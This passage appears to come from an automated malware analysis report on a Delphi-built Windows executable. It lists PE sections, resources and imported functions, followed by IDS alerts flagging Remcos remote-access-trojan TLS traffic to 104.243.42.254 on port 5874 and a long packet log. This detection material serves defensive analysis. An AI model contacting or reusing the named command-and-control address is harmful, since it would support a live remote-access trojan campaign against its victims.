.reloc | 0x7c000 | 0x7270 | 0x7400 | c03c7cb51eaa26e513ed1bed0f37e7fe | False | 0.6224744073275862 | data | 6.661969322059487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x84000 | 0xbec00 | 0xbec00 | d4c33b09f9db1492ded509cf91950b39 | False | 0.402672683895806 | data | 5.732887307792081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x85260 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x85394 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x854c8 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x855fc | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x85730 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x85864 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x85998 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x85acc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x85c9c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x85e80 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x86050 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x86220 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x863f0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x865c0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x86790 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x86960 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x86b30 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x86d00 | 0xb3e78 | Device independent bitmap graphic, 802 x 306 x 24, image size 736848 | English | United States | 0.40976783446059645
RT_BITMAP | 0x13ab78 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.39864864864864863
RT_BITMAP | 0x13aca0 | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
RT_BITMAP | 0x13adc8 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
RT_BITMAP | 0x13aef0 | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
RT_BITMAP | 0x13afd8 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3614864864864865
RT_BITMAP | 0x13b100 | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
RT_BITMAP | 0x13b228 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.49038461538461536
RT_BITMAP | 0x13b2f8 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3716216216216216
RT_BITMAP | 0x13b420 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.2905405405405405
RT_BITMAP | 0x13b548 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.38175675675675674
RT_BITMAP | 0x13b670 | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
RT_BITMAP | 0x13b798 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
RT_BITMAP | 0x13b8c0 | 0xe8 | Device independent bitmap graphic, 12 x 16 x 4, image size 128 | English | United States | 0.3620689655172414
RT_BITMAP | 0x13b9a8 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
RT_BITMAP | 0x13bad0 | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.375
RT_BITMAP | 0x13bbf8 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
RT_BITMAP | 0x13bcc8 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.36824324324324326
RT_BITMAP | 0x13bdf0 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
RT_BITMAP | 0x13bf18 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
RT_BITMAP | 0x13c040 | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.375
                                                                                                                      RT_BITMAP0x13c1680x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                                                                                                                      RT_BITMAP0x13c2900xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                                                                                      RT_BITMAP0x13c3780x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                                                                                                                      RT_BITMAP0x13c4a00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                                                                                                                      RT_BITMAP0x13c5c80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                                                                                      RT_BITMAP0x13c6980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                                                                                      RT_BITMAP0x13c7c00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                                                                                      RT_BITMAP0x13c8e80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                      RT_ICON0x13c9d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.2045643153526971
                                                                                                                      RT_DIALOG0x13ef780x52data0.7682926829268293
                                                                                                                      RT_DIALOG0x13efcc0x52data0.7560975609756098
                                                                                                                      RT_STRING0x13f0200x1fcdata0.47244094488188976
                                                                                                                      RT_STRING0x13f21c0x158data0.6017441860465116
                                                                                                                      RT_STRING0x13f3740xc8data0.67
                                                                                                                      RT_STRING0x13f43c0x134data0.5909090909090909
                                                                                                                      RT_STRING0x13f5700x494data0.3796928327645051
                                                                                                                      RT_STRING0x13fa040x368data0.3830275229357798
                                                                                                                      RT_STRING0x13fd6c0x37cdata0.38565022421524664
                                                                                                                      RT_STRING0x1400e80x3f8data0.37696850393700787
                                                                                                                      RT_STRING0x1404e00xf4data0.5532786885245902
                                                                                                                      RT_STRING0x1405d40xc4data0.6275510204081632
                                                                                                                      RT_STRING0x1406980x22cdata0.5017985611510791
                                                                                                                      RT_STRING0x1408c40x3b4data0.3227848101265823
                                                                                                                      RT_STRING0x140c780x368data0.37844036697247707
                                                                                                                      RT_STRING0x140fe00x2b8data0.3879310344827586
                                                                                                                      RT_RCDATA0x1412980x10data1.5
                                                                                                                      RT_RCDATA0x1412a80x2fcdata0.7028795811518325
                                                                                                                      RT_RCDATA0x1415a40x1295Delphi compiled form 'Tfrm_MainProg'0.2837923060752575
                                                                                                                      RT_GROUP_CURSOR0x14283c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x1428500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x1428640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1428780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x14288c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1428a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1428b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_ICON0x1428c80x14data1.25
                                                                                                                      RT_MANIFEST0x1428dc0x245XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5249569707401033
DLL | Import
--- | ---
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteA
comdlg32.dll | GetOpenFileNameA
Language of compilation system | Country where language is spoken | Map
--- | --- | ---
English | United States | 
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-12-06T11:04:28.472775+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50033 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:04:36.837037+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49716 | 185.166.143.50 | 443 | TCP
2024-12-06T11:04:39.532643+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49718 | 3.5.30.3 | 443 | TCP
2024-12-06T11:05:08.868641+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49730 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:05:31.035427+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49785 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:05:54.067255+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49856 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:06:16.114807+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49914 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:06:39.162175+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49967 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:07:01.193957+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50018 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:07:24.260479+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50028 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:07:46.319799+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50030 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:08:09.367055+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50031 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:08:31.397225+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50032 | 104.243.42.254 | 5874 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Dec 6, 2024 11:04:40.452173948 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.452234030 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.452263117 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.452280045 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.489888906 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.489912033 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.489969969 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.489983082 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.490040064 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.545156956 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.578406096 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578417063 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578438044 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578450918 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578551054 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.578551054 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.578572989 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578625917 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.582129955 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607275009 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607291937 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607336044 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607388973 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.607403040 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607414007 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.629743099 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629765034 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629797935 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629829884 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.629839897 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629888058 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.647061110 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647095919 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647109032 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647140026 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.647145033 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647161007 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647171021 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.647244930 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.661426067 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.661448002 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.661526918 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.661526918 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.661537886 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.661604881 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.662429094 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.676990032 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.677010059 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.677283049 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.677293062 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693413973 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693438053 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693487883 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.693495989 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693561077 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.736219883 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.736226082 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775197029 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775221109 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775258064 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775338888 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.775348902 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775403023 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.787213087 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787244081 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787251949 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787278891 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787317038 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.787327051 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787345886 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.798268080 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798284054 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798315048 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798340082 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.798347950 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798388958 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.808474064 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.808492899 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.808557987 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.808564901 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.808593035 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.818260908 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.818324089 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.818352938 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.818361044 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.818392038 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.824788094 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.824839115 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.824861050 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.824868917 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.824908018 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.831505060 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831556082 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831588030 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.831590891 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831603050 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831640959 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.831640959 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.959556103 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.959588051 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.959708929 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.959721088 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.959769011 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.960315943 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.966033936 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.966054916 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.966162920 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.966171980 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973402977 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973448038 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973483086 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973490000 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.973499060 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973519087 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.973541975 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.979950905 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.979979038 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.980014086 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.980031967 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.980037928 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.980057955 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.986135006 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.986155033 CET443497183.5.30.3192.168.2.6
